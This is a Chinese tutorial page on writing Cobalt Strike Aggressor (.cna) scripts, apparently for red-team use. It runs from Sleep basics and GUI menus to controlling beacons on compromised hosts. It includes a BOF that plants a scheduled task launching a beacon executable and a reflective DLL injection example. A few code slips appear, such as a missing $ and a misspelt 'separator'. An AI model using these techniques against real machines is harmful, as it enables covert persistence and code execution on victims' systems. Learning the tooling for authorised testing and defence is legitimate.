CNA插件开发

简介

Cobalt Strike的Aggressor脚本（.cna文件）是用一种名为Sleep的脚本语言编写的。Sleep语言是一种简洁的、动态类型的、类似Perl和JavaScript的语言，它被设计用来方便地进行脚本编写和快速原型开发

Sleep语言入门

变量

Sleep使用 $ 符号来定义变量。例如，$x = 5; 将变量 x 的值设置为5

数据类型

Sleep支持多种数据类型，这里主要讲两种，分别是数组(array)和哈希表(hash)

在 Sleep 中，你可以使用 @ 符号来创建数组。Sleep 还提供了一些函数来操作数组，例如 push()（将一个元素添加到数组的末尾）和 size()（获取数组的大小）

哈希表（也称为字典或映射）是一种可以存储键值对的数据结构。在 Sleep 中，你可以使用 % 符号来创建哈希表

# 创建一个空的数组
$my_array = @();

# 使用 push 函数将元素添加到数组的末尾
push($my_array, 1);
push($my_array, 2);
push($my_array, 3);

# 使用 size 函数获取数组的大小
$size = size($my_array);  # $size 的值现在是 3

println("Array: " . $my_array);  # 打印出 "Array: @(1, 2, 3)"
println("Size: " . $size);  # 打印出 "Size: 3"

# 创建一个空的哈希表
$my_hash = %();

# 将键值对添加到哈希表
$my_hash['key1'] = 'value1';
$my_hash['key2'] = 'value2';

# 获取哈希表的所有键和所有值
$keys = keys($my_hash);  # $keys 的值现在是 @('key1', 'key2')
$values = values($my_hash);  # $values 的值现在是 @('value1', 'value2')

println("Hash: " . $my_hash);  # 打印出 "Hash: %(key1 => 'value1', key2 => 'value2')"
println("Keys: " . $keys);  # 打印出 "Keys: @('key1', 'key2')"
println("Values: " . $values);  # 打印出 "Values: @('value1', 'value2')"

遍历操作

1.遍历数组：你可以使用 foreach 语句来遍历数组，如下所示，这个脚本会打印出数组中的每一个元素

$my_array = @(1, 2, 3, 4, 5);

foreach $element ($my_array) {
    println("Element: " . $element);
}

2.遍历哈希表：使用 foreach 语句来遍历哈希表。需要注意的是，遍历哈希表时，每一个元素都是一个键值对，如下代码会打印出哈希表种的每一个键和值

$my_hash = %(key1 => 'value1', key2 => 'value2');

foreach $pair ($my_hash) {
    $key = $pair[0];
    $value = $pair[1];
    println("Key: " . $key . ", Value: " . $value);
}

函数定义

你可以使用 sub 关键字来定义函数，如下代码所示，在command定义中，$1表示第一个参数；command关键字用于定义一个新的命令，当你aggressor命令行输入MyAdd加参数，命令的代码就会被执行

sub add {
    $x = $1;
    $y = $2;
    return $x + $y;
}

command MyAdd{
	$sum = add($1,$2);
	println("result=".$sum);
}

aggressor命令行

查看帮助

点击Script Console打开脚本控制台

然后输入help查看命令帮助，我将这些命令及其对应的含义总结在以下表格中了

命令

描述

!

执行shell命令。! ls将会在你的系统shell中执行ls命令

?

获取关于特定命令的帮助信息。例如，? load将会显示有关load命令的帮助信息

e

执行一段Aggressor脚本。例如，e println('Hello, World!');将会在命令行中打印出Hello, World!

help

获取命令行的帮助信息

history

查看命令历史

load

加载一个Aggressor脚本（.cna文件）

ls

列出当前已加载的Aggressor脚本

proff

关闭Aggressor的性能分析

profile

显示Aggressor的性能分析结果

pron

开启Aggressor的性能分析

reload

重新加载所有已经加载的Aggressor脚本

troff

关闭Aggressor的跟踪功能

tron

开启Aggressor的跟踪功能

unload

卸载一个已加载的Aggressor脚本

x

用于执行一个表达式并返回结果

加载脚本

在aggressor命令行执行load命令加载cna文件，以下是一个简单的字符串输出脚本代码。输入myprint，控制台输出“hello world”

command myprint{
	println("hello world");
}

除此之外，在CS的文件目录还有一个agscript文件，它用于运行Aggressor脚本（.cna文件）。你可以使用agscript来启动一个新的Cobalt Strike客户端，连接到一个Cobalt Strike团队服务器，并运行一个或多个Aggressor脚本，agscript的基本用法如下：

agscript [options] <host> <port> <user> <pass> <script> [<script> ...]

<host>、<port>、<user>和<pass>用于指定要连接的Cobalt Strike团队服务器的详细信息。
<script>参数用于指定要运行的Aggressor脚本。你可以指定一个或多个脚本

例如，你可以使用以下命令来运行一个名为my_script.cna的Aggressor脚本。这将会启动一个新的Cobalt Strike客户端，连接到运行在本地（127.0.0.1）的Cobalt Strike团队服务器，然后运行my_script.cna脚本

agscript 127.0.0.1 50050 myuser mypass my_script.cna

设置输出字体颜色

在Aggressor脚本中，可以使用 \c 跟随一个数字来改变接下来的文本颜色，以下是\c 后跟随的数字与颜色的对应关系：

默认颜色

黑色

红色

绿色

黄色

蓝色

白色

\c0

\c1

\c2

\c3

\c4

\c5

\c8

println("\c2This text is red.");
println("\c3This text is green.");
println("\c4This text is yellow.");
println("\c0This text is default color.");

CNA常用操作

绑定快捷键

使用关键字bind来绑定快捷键，以此执行指定的功能，如下代码绑定了快捷键Ctrl+H，当按了快捷键后会弹框提示“Hello World！”

bind Ctrl+H {
	show_message("Hello World!"); # 弹窗
}

菜单编写

1**.定义菜单**：使用popup函数定义一个新的菜单，如下所示，这将定义一个名为my_menu的新菜单

popup my_menu {
    # 菜单项将在这里定义
}

2.添加菜单项：在 popup 块内部，使用 item 函数添加菜单项。如下所示，将在 my_menu 菜单中添加两个菜单项，名为 "Menu Item 1" 和 "Menu Item 2"，当这些菜单项被点击时，会在控制台中打印相应的消息

popup my_menu {
    item("Menu Item 1", { println("You clicked Menu Item 1"); });
    separator();
    item("Menu Item 2", { println("You clicked Menu Item 2"); });
}

3.添加菜单到菜单栏：使用 menubar 函数将你的菜单添加到 Cobalt Strike 的菜单栏中，这将在菜单栏中添加一个新的菜单，名为 "My Menu"，当你点击这个菜单时，会显示你之前定义的 my_menu 菜单

popup my_menu {
    item("Menu Item 1", { println("You clicked Menu Item 1"); });
    separator();
    item("Menu Item 2", { println("You clicked Menu Item 2"); });
}

menubar("My Menu", "my_menu");

如果你不想在菜单栏上创建新的菜单，而是想在默认的菜单上添加菜单项，例如你想在Help菜单添加菜单项，你可以这样做：

popup help {
    item("关于作者信息:", { show_message("作者是个大帅哥！") });
	sparator();
}

使用popup函数并指定beacon_bottom 作为参数可以在右键单击 Beacon 会话时添加一个自定义的上下文菜单

popup beacon_bottom{item("打开百度", {url_open("https://www.baidu.com"); });}

还可以通过menu语句来创建多级菜单，menu语句中还能再嵌套一个menu语句

popup beacon_bottom { 
    menu "beacon菜单" {
        menu "子菜单一" {
            item("子子菜单一", { show_message("这是子子菜单一"); });
            item("子子菜单二", { show_message("这是子子菜单二"); });
        }
        item("子菜单二", { show_message("这是子菜单二"); });
    }
}

编写对话框

以下代码编写了一个对话框，用于实现数据交互

# 在Beacon的右键菜单中添加一个新的菜单项 "添加用户",当这个菜单项被点击时，调用 mydialog 子程序。
popup beacon_bottom { item("添加用户", { mydialog(); }); }

# 这是一个回调函数，当对话框关闭时，会被调用。
# 它接收三个参数：对话框的引用，按钮的名称，以及一个包含用户输入的哈希表。
sub callback {
	show_message("用户添加成功!\n"."dialog的引用是：".$1."\n按钮名称是：".$2);
	println("用户名是：".$3["user"]."\n密码是：".$3["password"]."\n用户类型是: ".$3["user_type"]);# 这里callback函数接收到了dialog传递过来的三个参数
}

# 这是一个子程序，用于创建一个对话框，让用户输入用户名和密码。
# 它使用 dialog 函数创建一个对话框，设置了默认值，指定了回调函数。
# 它使用 drow_text 函数添加一个密码输入框。
# 它使用 dbutton_action 函数添加一个动作按钮，当用户点击这个按钮时，会触发回调函数。
# 它使用 dbutton_help 函数添加一个帮助按钮，当用户点击这个按钮时，会打开 http://www.baidu.com 网页。
# 最后，使用 dialog_show 函数显示对话框。
sub mydialog {
	$info = dialog("对话框的标题", %(user => "Administrator", password => ""), &callback); 
	drow_text($info, "user", "输入用户账号"); 
	drow_text($info, "password", "输入用户密码"); 
	drow_combobox($info,"user_type","用户类型",@("普通用户","管理员"));
	dbutton_action($info, "添加用户"); # 点击按钮，触发回调函数
	dbutton_help($info, "http://www.baidu.com"); # 显示帮助信息
	dialog_show($info); # 显示对话框
}

以下是编写对话框常用到的一些函数：

dialog 函数在 Aggressor 脚本中用于创建一个新的对话框，以用来显示消息，获取用户输入，或执行其他与用户交互的任务，基本语法如下(注意，虽然 dialog 函数创建了一个对话框，但它并不会立即显示这个对话框。要显示对话框，你需要使用 dialog_show 函数)：

dialog(<标题>, <默认值>, <回调函数>)

<标题> 是一个字符串，用于设置对话框的标题。
<默认值> 是一个哈希表，用于设置对话框中各个字段的默认值。
<回调函数> 是一个函数，当对话框被关闭时，这个函数将被调用，对话框中用户输入的值将作为参数传递给这个函数

drow_text 函数用于在对话框中添加一个文本输入框。其基本语法如下

drow_text(<对话框>, <字段名>, <提示文本>)

这个函数接受三个参数：对话框（通过 dialog 函数创建），字段名（用于标识文本输入框），和提示文本（显示在文本输入框旁边的文本

dbutton_action 函数用于在对话框中添加一个动作按钮。当用户点击这个按钮时，会触发对话框的回调函数。这个函数接受两个参数：对话框（通过 dialog 函数创建）和按钮文本（显示在按钮上的文本）

dbutton_action(<对话框>, <按钮文本>)

dbutton_help 函数用于在对话框中添加一个帮助按钮。当用户点击这个按钮时，会在默认的网页浏览器中打开一个网页。其基本语法是

dbutton_help(<对话框>, <网址>)

drow_combobox函数用于在对话框中添加一个下拉列表（也称为组合框或combobox）。其基本语法如下：

drow_combobox($dialog, $key, $label, @options);

$dialog 是对话框的引用，通常是通过dialog函数创建的。
$key 是一个字符串，用于标识这个下拉列表。当用户在下拉列表中选择一个选项时，这个选项的值会被存储在对话框的数据中，可以通过这个键来访问。
$label 是一个字符串，用于显示在下拉列表旁边的标签。
@options 是一个数组，包含了下拉列表中的所有选项。

数据模型

Cobalt Strike的数据模型提供了一组功能，通过这些功能，你可以查询和操作Cobalt Strike中存储的各种数据。这包括目标信息、凭证、下载的文件、键盘记录等。这些功能通过一系列的函数提供，你可以在Aggressor脚本中使用这些函数

以下是一些常用的数据接口：

targets：用于查询和操作Cobalt Strike中存储的目标信息。
archives：用于查询Cobalt Strike最近的活动信息。
beacons：用于查询和操作Cobalt Strike中的Beacon会话。Beacon是Cobalt Strike的一个轻量级恶意软件，可以在受感染的主机上运行，并与团队服务器通信。
credentials：用于查询和操作Cobalt Strike存储的凭证信息。这些凭证可能是攻击者从目标系统上获取的密码、哈希值或Kerberos票据。
downloads：用于查询和操作Cobalt Strike下载的文件。
keystrokes：用于查询Cobalt Strike记录的键盘输入。
screenshots：用于查询Cobalt Strike获取的屏幕截图。
sites：这用于查询和操作Cobalt Strike托管的资产，例如监听器和stagers。
servers：用于查询和操作Cobalt Strike的团队服务器。

如下是使用targets函数查询beacon数据的实例：

x targets()：这个命令返回了一个数组，数组中的每个元素都是一个哈希表，代表了一个目标。哈希表中包含了目标的地址（'address'）、操作系统（'os'）、主机名（'name'）和版本（'version'）。
x targets()[0]：这个命令返回了数组中的第一个元素，也就是第一个目标的信息。
x targets()[0]['address']：这个命令返回了第一个目标的地址。

Beacon

目标主机上线后，C2会为其分配一个唯一的随机数ID，我们可使用beacon_ids()来获取所有会话的ID

x beacon_ids()

获取到会话ID后，可使用beacon_info()来获取指定会话的所有数据

x beacon_info(beacon_ids()[0])

当然你还可以使用beacons()来获取所有会话的所有信息

beacon_initial是Cobalt Strike的Aggressor脚本中的一个预定义事件。当一个新的Beacon首次上线时，这个事件就会被触发，并返回一个会话ID（$1）

如下代码所示, 它会在新的Beacon首次上线时弹出一个消息框，显示Beacon的一些基本信息

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;

    # 获取Beacon的一些基本信息
    $user = beacon_info($beacon_id, "user");
    $host = beacon_info($beacon_id, "host");
    $pid = beacon_info($beacon_id, "pid");
    $os = beacon_info($beacon_id, "os");

    # 构造要显示的消息
    $message = "新的Beacon上线！\n\n";
    $message = $message . "User: " . $user . "\n";
    $message = $message . "Host: " . $host . "\n";
    $message = $message . "PID: " . $pid . "\n";
    $message = $message . "OS: " . $os . "\n";

    # 显示消息框
    show_message($message);
}

binput函数实际上是将字符串发送到Beacon的命令行, 其第一个参数是beacon的ID, 第二个参数是你想要输出至beacon命令行的字符串

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;
	
    binput($beacon_id, "有一个beacon上线了");
}

bshell函数用于在指定的beacon会话执行一个shell命令

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;
    binput($beacon_id, bshell(beacon_id,"whoami"));
}

常见示例

与BOF相关

涉及函数

script_resource(path)：获取脚本资源的路径，当然不只限于bof(.obj)文件，还可以是exe、cna等等。要注意的是，脚本资源的路径要一定填写相对路径( 相对于cna文件)

openf和readb：打开文件并读取

bofpack：将参数打包成一个字节流，然后传递给BOF中的go函数，其语法格式如下：

bof_pack($beacon_id, "iz", $my_int, $my_string);

其中参数2是格式字符串，用于指定参数的类型，这个字符串可以包含以下字符：

i：表示一个32位整数。
I：表示一个64位整数。
d：表示一个双精度浮点数。
z：表示一个以null结尾的字符串。
Z：表示一个以null结尾的宽字符串（即，每个字符由两个字节表示）。

beacon_inline_execute：用于在指定的Beacon中执行一个BOF，该函数接收四个参数：

参数一：Beacon的ID，这是一个整数，表示你想要在哪个Beacon中执行BOF。
参数二：BOF的内容，这是一个字节流，通常是你从BOF文件中读取的内容。
参数三：BOF中的函数名，这是一个字符串，表示你想要执行的函数。
参数四：传递给BOF函数的参数，这是一个字节流，通常是你使用bof_pack函数创建的。

alias：在Cobalt Strike的Aggressor脚本中，command和alias都是用来定义新的命令的，但它们的使用场景是不同的

command函数定义的命令是在Cobalt Strike的脚本控制台中使用的，而alias函数定义的命令是在Beacon的命令行中使用的

实例演示

如下实例演示添加计划任务

# $1 = beacon ID
# $2 = task_name
# $3 = author
# $4 = description
# $5 = command
# $6 = args

alias boftask {
    # 检查参数数量是否正确
    if (size(@_) != 6){
        berror($1,"boftask: args error");
        return;
    }
		
    # 打开BOF文件并读取内容
    local('$handle $data $args'); #定义了三个局部变量
    $handle = openf(script_resource("BofTest.x64.obj"));  # 打开BOF文件
    $data = readb($handle, -1);  # 读取BOF文件的内容
    closef($handle);  # 关闭BOF文件
	
    # 设置参数
    # 使用bof_pack函数将参数打包成一个字节流
    # "ZZZZZ"表示我们有五个宽字符串参数,小写的z表示以null结尾的字符串
    $args = bof_pack($1, "ZZZZZ", $2, $3, $4, $5, $6);
	
    # 执行BOF
    # 使用beacon_inline_execute函数来执行BOF
    # "go"是BOF中的函数名，$args是传递给这个函数的参数
    beacon_inline_execute($1, $data, "go", $args);

    # 向用户通知任务已经开始
    # 使用btask函数在Beacon的控制台中显示一条消息
    btask($1, "Creating scheduled task as $2");
}

如下是bof的代码，此处我只给出了go函数的代码：

void go(char* buff, int len) {
	
	// datap是BOF框架中定义的结构体，用于解析从Beacon接收到的数据
	// 当你在Beacon执行BOF时，可以向BOF传递一些参数，这些参数会被打包成一个字节流
	// BOF会使用datap结构体来解析这个字节流，从而获取到传递的参数
	datap parser;

	// 设置创建的计划任务的相关信息
	wchar_t* task_name,
		* author,
		* description,
		* command,
		* args;

	// 初始化datap结构体变量(parser),用于解析从Beacon接收到的字节流(buff)
	BeaconDataParse(&parser, buff, len); 

	task_name = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取任务名
	author = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取作者名
	description = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取描述
	command = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取要执行的命令
	args = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取命令的参数

	if (!com_init()) // 初始化COM库
		return;

	if (!task_create(task_name, author, description, command, args)) // 创建计划任务
		
		return;

	CoUninitialize(); // 关闭COM库
}

beacon命令行执行：boftask "test" "henry" "this is bof" "C:\\beacon.exe" ""

查看目标主机的计划任务列表可以发现，计划任务成功添加上了

反射dll执行

涉及函数

bdllspawn是一种使用Cobalt Strike进行DLL注入的技术，它允许攻击者在新的或已存在的进程中注入并执行DLL。这种方法通常用于创建新的进程，并将恶意DLL加载到该进程中执行，但是创建新进程可能会引起安全软件的注意

bdllinject允许攻击者将DLL注入到已存在的进程中。这意味着攻击者可以选择一个正常运行的、不会引起怀疑的进程，并将其用作恶意DLL执行的宿主，如果选择的宿主进程被安全软件密切监控，或者如果DLL注入导致进程行为异常，这种方法可能会增加被检测的风险。相比bdllspawn，该函数无法在插件中实现传递参数给dll文件。

实例演示

如下Aggressor代码用于测试反射dll能否加载成功

# 测试反射dll注入
alias rdi_inject{
    local('$bid $dll $args');
    $bid = $1;
    $dll = "C:\\your.dll";
    btask($bid, "Injecting reflective dll into new process!(fork run)");
    bdllspawn($bid, $dll, "Hello World", "test dll", 5000);
}

如下cpp代码依赖ReflectiveDLLInjection项目，可以用lpReserved来传递参数给dll（注：如果要将传递的参数打印至beacon命令行界面，最好使用printf来输出，若以unicode形式来输出参数可能会出现乱码）

#include "ReflectiveLoader.h"
#include <iostream>

extern HINSTANCE hAppInstance;
EXTERN_C IMAGE_DOS_HEADER __ImageBase;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
	BOOL bReturnValue = TRUE;
	DWORD dwResult = 0;

	switch (dwReason) {
	case DLL_QUERY_HMODULE:
		if (lpReserved != NULL)
			*(HMODULE*)lpReserved = hAppInstance;
		break;
	case DLL_PROCESS_ATTACH:
		hAppInstance = hinstDLL;
		fflush(stdout);
		if (lpReserved != NULL) {
			printf("Parameter: %s\n", (char*)lpReserved);
		}
		else {
			printf("No Parameter！");
		}
		
		fflush(stdout);
		ExitProcess(0);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}
	return bReturnValue;
}

beacon命令行测试Dll能否运行成功

参考链接

https://cloud.tencent.com/developer/article/1785567
https://www.bilibili.com/video/BV1pU4y1C7xh/?spm_id_from=333.337.search-card.all.click&vd_source=a6caf742912abf241ffbcb3c11933841
https://maka8ka.cc/post/cobaltstrike-bof%E5%8F%8A%E5%AF%B9%E5%BA%94%E7%9A%84cna%E8%84%9A%E6%9C%AC/
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm

上一页Cross2生成LinuxShell 下一页Profile编写规则

最后更新于1年前

简介

Sleep语言入门

变量

数据类型

遍历操作

函数定义

aggressor命令行

查看帮助

加载脚本

设置输出字体颜色

CNA常用操作

绑定快捷键

菜单编写

编写对话框

数据模型

Beacon

常见示例

与BOF相关

涉及函数

实例演示

反射dll执行

涉及函数

实例演示

推荐编辑器

参考链接